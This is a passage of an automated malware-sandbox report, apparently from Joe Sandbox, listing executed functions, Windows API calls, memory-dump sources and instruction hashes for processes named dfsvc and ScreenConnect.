                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC016531D02E219BCB759F6C94017BDB3E0EF49720B154689E95077292CBF06D518FC2
                                                                                                                                                                                                                                                          Function 00BB55CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CommandLine
                                                                                                                                                                                                                                                          • String ID: `%y
                                                                                                                                                                                                                                                          • API String ID: 3253501508-1992035149
                                                                                                                                                                                                                                                          • Opcode ID: e12594ccadd7c2a3c338f711b4bf198001aa04accb373cd55804f7ad053879ae
                                                                                                                                                                                                                                                          • Instruction ID: fba97c680557f35cc8ab727c43824ccd037f4ca364b760416971bf5423cb3d8c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e12594ccadd7c2a3c338f711b4bf198001aa04accb373cd55804f7ad053879ae
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41B048B89002818B8700AF2AA948C993BA0A7492023C00965D82693231EFB800889A00

                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                          Execution Coverage:20.7%
                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                          Total number of Nodes:9
                                                                                                                                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                                                                                                                                          execution_graph 4782 7ffe7dd41794 4784 7ffe7dd4179f LoadLibraryExW 4782->4784 4785 7ffe7dd41836 4784->4785 4786 7ffe7dd415e2 4787 7ffe7dd9b660 CreateUrlCacheEntryW 4786->4787 4789 7ffe7dd9b826 4787->4789 4779 7ffe7dd49aa7 4780 7ffe7dd49ab4 CreateFileW 4779->4780 4781 7ffe7dd49b2c 4780->4781

                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                          Function 00007FFE7DD415E2 Relevance: 1.8, APIs: 1, Instructions: 256COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2259030651.00007FFE7DD40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD40000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffe7dd40000_dfsvc.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CacheCreateEntry
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3741994674-0
                                                                                                                                                                                                                                                          • Opcode ID: 17ae5cc1195a009b7c013923e5c1640cc0baed6de88ec2d03ce4ac48187798a2
                                                                                                                                                                                                                                                          • Instruction ID: e9f487383770c38f7c9e1d36fecfc1d4b49ba7f7ba413a0bda25449abb6ad13b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17ae5cc1195a009b7c013923e5c1640cc0baed6de88ec2d03ce4ac48187798a2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15819E31918A4D8FEBA8DF18C8857F97BE0FF58311F01432AE85DC72A1DB75A9458B81
                                                                                                                                                                                                                                                          Function 00007FFE7DD41794 Relevance: 1.6, APIs: 1, Instructions: 105libraryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 32 7ffe7dd41794-7ffe7dd417f8 36 7ffe7dd41802-7ffe7dd41834 LoadLibraryExW 32->36 37 7ffe7dd417fa-7ffe7dd417ff 32->37 38 7ffe7dd41836 36->38 39 7ffe7dd4183c-7ffe7dd41863 36->39 37->36 38->39
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2259030651.00007FFE7DD40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD40000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffe7dd40000_dfsvc.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                                          • Opcode ID: b973e10bdf78d6b155d11407ba37f2eb7afeba8f7f9d3e59a5c0a824aac8f88d
                                                                                                                                                                                                                                                          • Instruction ID: 70fac12d2889c4fdc93a0d9268a80c7fc3849d884f8504fa1b84d9987ef2c935
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b973e10bdf78d6b155d11407ba37f2eb7afeba8f7f9d3e59a5c0a824aac8f88d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E31913190CA1C9FDB69DB9884496EABBE0FF65321F04422BD009D3651DB75A806CB91
                                                                                                                                                                                                                                                          Function 00007FFE7DD415B2 Relevance: 1.6, APIs: 1, Instructions: 102libraryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 50 7ffe7dd415b2-7ffe7dd417f8 54 7ffe7dd41802-7ffe7dd41834 LoadLibraryExW 50->54 55 7ffe7dd417fa-7ffe7dd417ff 50->55 56 7ffe7dd41836 54->56 57 7ffe7dd4183c-7ffe7dd41863 54->57 55->54 56->57
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2259030651.00007FFE7DD40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD40000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffe7dd40000_dfsvc.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                                          • Opcode ID: 66b564fd4e13abae3245fa8573304ed10b4cf49d65038291443bbf0fb7f65cff
                                                                                                                                                                                                                                                          • Instruction ID: bf16c0bbab3734183e854f2a864fabea14a383ee41835454451146e32e52f4b1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66b564fd4e13abae3245fa8573304ed10b4cf49d65038291443bbf0fb7f65cff
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4218131908A1C9FDB59DB58C449BFABBE0FF65311F14422FD009D3651DB71A8068B91
                                                                                                                                                                                                                                                          Function 00007FFE7DD41492 Relevance: 1.6, APIs: 1, Instructions: 102libraryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 41 7ffe7dd41492-7ffe7dd417f8 45 7ffe7dd41802-7ffe7dd41834 LoadLibraryExW 41->45 46 7ffe7dd417fa-7ffe7dd417ff 41->46 47 7ffe7dd41836 45->47 48 7ffe7dd4183c-7ffe7dd41863 45->48 46->45 47->48
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2259030651.00007FFE7DD40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD40000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffe7dd40000_dfsvc.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                                          • Opcode ID: 66b564fd4e13abae3245fa8573304ed10b4cf49d65038291443bbf0fb7f65cff
                                                                                                                                                                                                                                                          • Instruction ID: bf16c0bbab3734183e854f2a864fabea14a383ee41835454451146e32e52f4b1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66b564fd4e13abae3245fa8573304ed10b4cf49d65038291443bbf0fb7f65cff
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4218131908A1C9FDB59DB58C449BFABBE0FF65311F14422FD009D3651DB71A8068B91
                                                                                                                                                                                                                                                          Function 00007FFE7DD49AA7 Relevance: 1.6, APIs: 1, Instructions: 82fileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 152 7ffe7dd49aa7-7ffe7dd49b2a CreateFileW 154 7ffe7dd49b32-7ffe7dd49b65 152->154 155 7ffe7dd49b2c 152->155 155->154
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2259030651.00007FFE7DD40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD40000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffe7dd40000_dfsvc.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                                                          • Opcode ID: fee737b301586670db3a64499b1af0bac09010b9fb549f36b0cabaaa9a3a491f
                                                                                                                                                                                                                                                          • Instruction ID: 145273f7e2aa08d51358b965edae36239531806735ea3ae7743fec61b60d77e1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fee737b301586670db3a64499b1af0bac09010b9fb549f36b0cabaaa9a3a491f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4521AC30A0CA588FDB58DF1CE445BA9BBE0FB59324F14429FE04DD3662CB35A941CB85
                                                                                                                                                                                                                                                          Function 00007FFE7DC2EF3C Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2258516606.00007FFE7DC2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DC2D000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffe7dc2d000_dfsvc.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: da7ff63669a98a44ace7868a8532236594e2bc6ffeb4c2fc3223cdf9b437b599
                                                                                                                                                                                                                                                          • Instruction ID: f177c3c2f29503513175398a0f7d3cc593bb11639d6eec3da108bf33218abcae
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da7ff63669a98a44ace7868a8532236594e2bc6ffeb4c2fc3223cdf9b437b599
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74111F7251CF088F9BA8EF1DE48595677E0FB98320B10465FE459C7665D731F881CB82

                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                          Execution Coverage:8.3%
                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                          Total number of Nodes:9
                                                                                                                                                                                                                                                          Total number of Limit Nodes:0

                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                          Function 00007FFE7DD54883 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1754221133.00007FFE7DD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD50000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffe7dd50000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 5e52933136d5c9297f66986cc57b8603aa2d7c46d6ada6995257914c78312c8c
                                                                                                                                                                                                                                                          • Instruction ID: 74efb4363369151ca8478e800e6e8e4e21fbc6d45e89dd08d51eea1533ffef61
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e52933136d5c9297f66986cc57b8603aa2d7c46d6ada6995257914c78312c8c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB31E43191CB188FDB18DF5C98466FD7BE0EBA9311F00433EE08AD3251DB75A8068B82
                                                                                                                                                                                                                                                          Function 00007FFE7DD54982 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 8 7ffe7dd54982-7ffe7dd6f2d5 GetTokenInformation 12 7ffe7dd6f2dd-7ffe7dd6f30e 8->12 13 7ffe7dd6f2d7 8->13 13->12
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1754221133.00007FFE7DD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD50000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffe7dd50000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InformationToken
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4114910276-0
                                                                                                                                                                                                                                                          • Opcode ID: afb379193eef9de25182b27ca47b7115668882f2ce0e4850feeef67c538f70e0
                                                                                                                                                                                                                                                          • Instruction ID: 2bbf4209357ac5794d06ce94f88d760e3d59d93387f8e5760cb0048ea32c2a46
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afb379193eef9de25182b27ca47b7115668882f2ce0e4850feeef67c538f70e0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7831B17191CB188FDB18DF5C98466FD77E0EBA9325F00422EE08AD3251DB74A8068B92
                                                                                                                                                                                                                                                          Function 00007FFE7DD53E9A Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 15 7ffe7dd53e9a-7ffe7dd58550 SetProcessMitigationPolicy 18 7ffe7dd58552 15->18 19 7ffe7dd58558-7ffe7dd58587 15->19 18->19
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1754221133.00007FFE7DD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD50000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffe7dd50000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1088084561-0
                                                                                                                                                                                                                                                          • Opcode ID: 9cef9842808dfcb1bbc79eac54ce1f94e3f4fc7b3ed3ace4f16c4a75ba3f0f2a
                                                                                                                                                                                                                                                          • Instruction ID: 44d7b75cf25eba0ca7ee5053d3cb6135de89707c160a94cef8c599ffdbfbf905
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cef9842808dfcb1bbc79eac54ce1f94e3f4fc7b3ed3ace4f16c4a75ba3f0f2a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8221F73191CB188FDB289F9C984A5F977E0EB69711F00422FE44AD3211DB70B8458B81
                                                                                                                                                                                                                                                          Function 00007FFE7DD53DEA Relevance: 1.3, APIs: 1, Instructions: 91COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 21 7ffe7dd53dea-7ffe7dd6f4e9 CloseHandle 24 7ffe7dd6f4f1-7ffe7dd6f51f 21->24 25 7ffe7dd6f4eb 21->25 25->24
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1754221133.00007FFE7DD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD50000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffe7dd50000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                                                          • Opcode ID: 28418eae419f43d2fdc298cdf6dfa502bf2016d50e3eb73dcb0242776f858821
                                                                                                                                                                                                                                                          • Instruction ID: 41199feb3879fbd630a24cc32926ca6c44937aa9f918e131531792bd4947d430
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28418eae419f43d2fdc298cdf6dfa502bf2016d50e3eb73dcb0242776f858821
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E21C13190CA1C9FDB58DF98C449BF9BBE0EBA5321F00422ED049D3651DB71A856CB90

                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                          Function 016C2013 Relevance: 2.9, Strings: 2, Instructions: 413COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: nCwq$
                                                                                                                                                                                                                                                          • API String ID: 0-3800751292
                                                                                                                                                                                                                                                          • Opcode ID: 747fe61d3ae93db450f5717d27a444608192a4553e7998e73cedfcb7ff1a82f1
                                                                                                                                                                                                                                                          • Instruction ID: b4c8d1b20beb2a3a73990d3aea149505091f7de61561b45bee83d33e85ce9fae
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 747fe61d3ae93db450f5717d27a444608192a4553e7998e73cedfcb7ff1a82f1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1771EF307002068FC7169B38CD686BEBBE2EB85614B14816DD806DB36ADF35DC46CB91
                                                                                                                                                                                                                                                          Function 016C1828 Relevance: 2.5, Strings: 2, Instructions: 48COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: $_q$$_q
                                                                                                                                                                                                                                                          • API String ID: 0-458585787
                                                                                                                                                                                                                                                          • Opcode ID: d7c1a394bdb2b6209ea1c287f78638690715bf8cdbef5b094718fb815cbbac28
                                                                                                                                                                                                                                                          • Instruction ID: 0d7191affefaa96675ec9262e53911db645e1c719c934678aa8f7c0283cb4c2f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7c1a394bdb2b6209ea1c287f78638690715bf8cdbef5b094718fb815cbbac28
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01019230A0A345CFD72A9B799D1842A7FB5EB47A2131640EAE415CB3A7C7358C41C756
                                                                                                                                                                                                                                                          Function 016C5238 Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: (cq
                                                                                                                                                                                                                                                          • API String ID: 0-301743287
                                                                                                                                                                                                                                                          • Opcode ID: 32f1e9ba4e28414ef991511090a3e5b99754a6d679614de7a34d7479077044cf
                                                                                                                                                                                                                                                          • Instruction ID: a231dab74174bc0e020373f66af71e939ecc4643366672cd414a5031136d05a7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32f1e9ba4e28414ef991511090a3e5b99754a6d679614de7a34d7479077044cf
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19613674B106058FDB15DFA8D894A6EBBF2FF8D704B1485A8E506AB365DB30EC01DB80
                                                                                                                                                                                                                                                          Function 016C6F48 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: LR_q
                                                                                                                                                                                                                                                          • API String ID: 0-2241839734
                                                                                                                                                                                                                                                          • Opcode ID: 55315d53be49c555e11734c52d9dce2bc1f8a26d9c1c5489577b567c802ee976
                                                                                                                                                                                                                                                          • Instruction ID: 19eadc33486878ba9bb37dcaf11ceccd9e63731c1ca090236f0bd2d29d89ca5d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55315d53be49c555e11734c52d9dce2bc1f8a26d9c1c5489577b567c802ee976
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D651EF34B002159FDB259B68DC54B7EBBE2FF84B10F148A2EE45A9B390DB319C45CB81
                                                                                                                                                                                                                                                          Function 016C42F0 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: (cq
                                                                                                                                                                                                                                                          • API String ID: 0-301743287
                                                                                                                                                                                                                                                          • Opcode ID: 3ad9b6397eb0ab7c64f1a0c79c1b5cbe6acba7d354a811f1bd90f72d73428571
                                                                                                                                                                                                                                                          • Instruction ID: 657d2fa61d7d09d6f4d855ffdfcea4299e895b8771ee5049b447eb92339f4839
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ad9b6397eb0ab7c64f1a0c79c1b5cbe6acba7d354a811f1bd90f72d73428571
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A641B131A00106DBCB14DF69E9A46ADBBB6FFC4710B14C569D9099F349DF34E806CB90
                                                                                                                                                                                                                                                          Function 016C3480 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: ['
                                                                                                                                                                                                                                                          • API String ID: 0-410297704
                                                                                                                                                                                                                                                          • Opcode ID: ab3f05fa9e24aa76c3be91c1285d1fb741744320b8552adea2f2c55307d28cd5
                                                                                                                                                                                                                                                          • Instruction ID: c982e2b77e765915fd3637f155bc3e39d661c6943eadfb4f9e360e485e31a479
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab3f05fa9e24aa76c3be91c1285d1fb741744320b8552adea2f2c55307d28cd5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB41A3307002125FCB119B7D9C945AEBBE6FBC9610345853DD819DB344EF749D098BE1
                                                                                                                                                                                                                                                          Function 016C8100 Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: V
                                                                                                                                                                                                                                                          • API String ID: 0-1342839628
                                                                                                                                                                                                                                                          • Opcode ID: b71785c0e61f76f57686cd7100d502341152e9915b65277e6e9e08c59d039e72
                                                                                                                                                                                                                                                          • Instruction ID: e82763a67d79f76cd6991e35c95e7fe81ec48ba0d2083d8ab292c369a1bb7df8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b71785c0e61f76f57686cd7100d502341152e9915b65277e6e9e08c59d039e72
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DFF0CDB140C3829FC741EF349C88184BFF0EE1216070986DAC899CB592E328A81BCB12
                                                                                                                                                                                                                                                          Function 016C7FB8 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
